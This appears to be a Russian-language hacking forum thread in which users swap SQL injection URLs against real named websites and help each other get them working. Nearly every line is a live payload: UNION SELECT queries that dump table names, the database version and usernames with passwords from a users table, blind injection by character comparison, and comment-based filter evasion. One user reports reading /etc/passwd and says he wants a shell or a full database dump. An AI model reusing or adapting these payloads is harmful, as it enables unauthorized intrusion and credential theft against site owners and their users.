http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,2,table_name+from+iNformation_schema.tables+--+ почему не выводит результат? ошибки тоже нет, в коде смотрел
хекс хекс хекс http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(version())),3--
спасибо буду знать вот еще blind http://www.bispublishers.nl/bookpage.php?id=142+and+ascii(lower(substring(user(),1,1)))<106+--+ очень мало шарю в слепых, помогите раскрутить, да и ткните плиз носом в фак по слепым, читай несколько... немного не понял
с чего ты взял что она слепая? вывод в самом низу. HTML: http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+users--
Оо фейл! я проверял у меня выводило 48 полей! да и запрос and 1=2 была пустая страница, такое в blind я читал
Во-первых, букву диска писать не надо. Во-вторых, я написал "Возможно, получится читать файлы на сервере. Например так". Все зависит от конкретного сайта, без ссылки нельзя ничего точно сказать.
M_script MySQL на дебиане 5.0, какие файлы в принципе возможно прочитать? Пробовал читать все подряд, и /etc/mysql/mysqlaccess.conf и /var/www/index.html (по моему по дефолту присутствует, не?) но ничего кроме /etc/passwd.. Почитать скрипты обращающиеся к MySQL не могу, мои запросы ведь исполняются на сервере MySQL, как я могу прочитать скрипты лежащие совсем на другом сервере?.. php include нет, ничего нет.. Кроме проклятой скули.. Нужен очень шелл.. Ну или вся БД, блайндом я ее 3 года дампить буду...
на сайте есть sql inj подобрал поля с помощью GROUP BY потому что ORDER BY не прокатило пробую узнать версию, все равно выдает ошибку, какая то мудреная inj я с такой не сталкивался подскажите
там могут быть фильтрации, если есть вывод ошибки то попробуй через блинд, а вообще такие вопросы лудше с линками кидать, дабы можно что то было адекватней ответить по ситуации.
блайнд Code: http://www.fbskins.com/facebook-layouts/cat.php?id=(75)and(1)=if(mid((select(version())),1,1)=5,1,0)--+
http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,table_name+from+information_schema.tables+--+ почему выдает ошибку 500 ?
http://notice.spacash.com/2257.php?id=-2902+union+select+5,unhex(hex(version())),666,666,666,666,666,666,5,1000--+ ответ на твой вопрос. версия 4+
попугай, ошибся. http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+from http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*from*/ http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+frm http://notice.spacash.com/2257.php?id=-2902+union+select+1,2,3,4,5,6,7,8,9,10+--+/*frm*/ http://notice.spacash.com/2257.php?id=-2902/*select+*//*from*/ upd: http://notice.spacash.com/2257.php?id=-2902+union+select/**/1,2,3,4,5,6,7,8,9,10+from+XXX+--+
Code: notice.spacash.com/2257.php?id=(0)union+select(1),hex(version()),3,4,5,6,7,8,9,(10)from(table)--+ [upd] не успел чуток )
